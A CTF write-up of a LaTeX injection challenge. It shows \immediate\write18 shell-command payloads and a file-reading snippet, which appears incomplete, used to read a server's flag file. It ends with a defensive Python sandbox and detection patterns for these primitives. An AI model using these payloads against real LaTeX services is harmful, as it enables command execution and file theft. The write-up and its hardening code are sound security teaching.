Internetwache CTF 2016 — Web90 — Texmaker

This problem was my favorite of those I tried. When first navigating to the challenge site, you are presented with an input field which generates LaTeX, which is then used to generate a PDF.
This paper discusses methods for exploiting LaTeX, including some sample code which could be used for reading files from the server.
    \read5 to \curline
    \ifeof5 \let\next=\relax
    \else \curline~\\
    \next} %
    \ifeof5 Couldn’t Read the File! %
    \else \readfile \closein5

After generating and checking the PDF I got the following:
Sweet sweet local files
The next step was learning how I could execute commands to look around the file system. I came across the \immediate\write18 combo of commands in this post, which will allow you to run commands on the server. The following line writes the output of the ls command to a temporary file:
\immediate\write18{ls /tmp/ > /tmp/tmpfile}

Looking into the /var/www/ directory, I found what I suspected was my flag file (flag.php).
Probably just cat the file right?
After trying a number of other ways of accessing the file (cat, grep, sed, head, tail, etc.) I tried to run php -s, which returns the source of the input PHP file.
I put together the following final payload and browsed to /pdf/derp.txt (as it was publicly accessible), revealing the flag!
\immediate\write18{php -s ../flag.php > ../pdf/derp.txt}
There’s the flag!
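
Seen from the side of whoever runs such a LaTeX-to-PDF service, both steps above depend on defaults that can be switched off. The following is an added example, not code from the challenge or the original post: it assumes a TeX Live `pdflatex` (kpathsea honours `openin_any` and `openout_any` from the environment), and the function and rule names are hypothetical.

```python
import os
import re
import subprocess
import tempfile

# Constructed rules for the primitives this write-up used. TeX control words
# are letters only, so "\read5" is \read followed by 5: use a letter
# lookahead instead of \b. Pattern matching is for logging and alerting;
# the enforcement is in the compiler flags and environment below.
RULES = {
    "file-read": re.compile(r"\\(?:openin|read|input|include)(?![A-Za-z])"),
    "shell-escape": re.compile(r"\\write\s*18(?!\d)"),
    "obfuscation": re.compile(r"\^\^|\\catcode(?![A-Za-z])"),
}

def find_risky(tex):
    """Return the sorted names of the rules that match the submitted source."""
    return sorted(name for name, rx in RULES.items() if rx.search(tex))

def sandbox_invocation(jobname="job"):
    """Return (argv, env) for compiling untrusted input with pdflatex."""
    argv = ["pdflatex", "-no-shell-escape", "-interaction=nonstopmode",
            "-halt-on-error", jobname + ".tex"]  # relative name, run with cwd=workdir
    env = {
        "PATH": os.environ.get("PATH", "/usr/bin:/bin"),
        # p = paranoid: no dotfiles, no parent-directory paths, and absolute
        # paths only under TEXMFOUTPUT.
        "openin_any": "p",   # applies to files TeX reads (\openin, \input)
        "openout_any": "p",  # applies to files TeX writes
    }
    return argv, env

def compile_untrusted(tex, timeout=20):
    """Compile in a throwaway directory and return the PDF bytes."""
    argv, env = sandbox_invocation()
    with tempfile.TemporaryDirectory() as work:
        env["HOME"] = work  # keep caches out of the service account's home
        with open(os.path.join(work, "job.tex"), "w", encoding="utf-8") as fh:
            fh.write(tex)
        subprocess.run(argv, cwd=work, env=env, timeout=timeout, check=True,
                       stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        with open(os.path.join(work, "job.pdf"), "rb") as fh:
            return fh.read()

if __name__ == "__main__":
    sample = r"\immediate\write18{ls /tmp/ > /tmp/tmpfile}"  # line from the write-up
    print(find_risky(sample), sandbox_invocation()[0])
```

With `-no-shell-escape` the `\write18` lines are not executed at all, and the paranoid `openin_any` setting rejects reads outside the working directory; running the compiler as an account that cannot read the web root is a further layer this sketch does not cover.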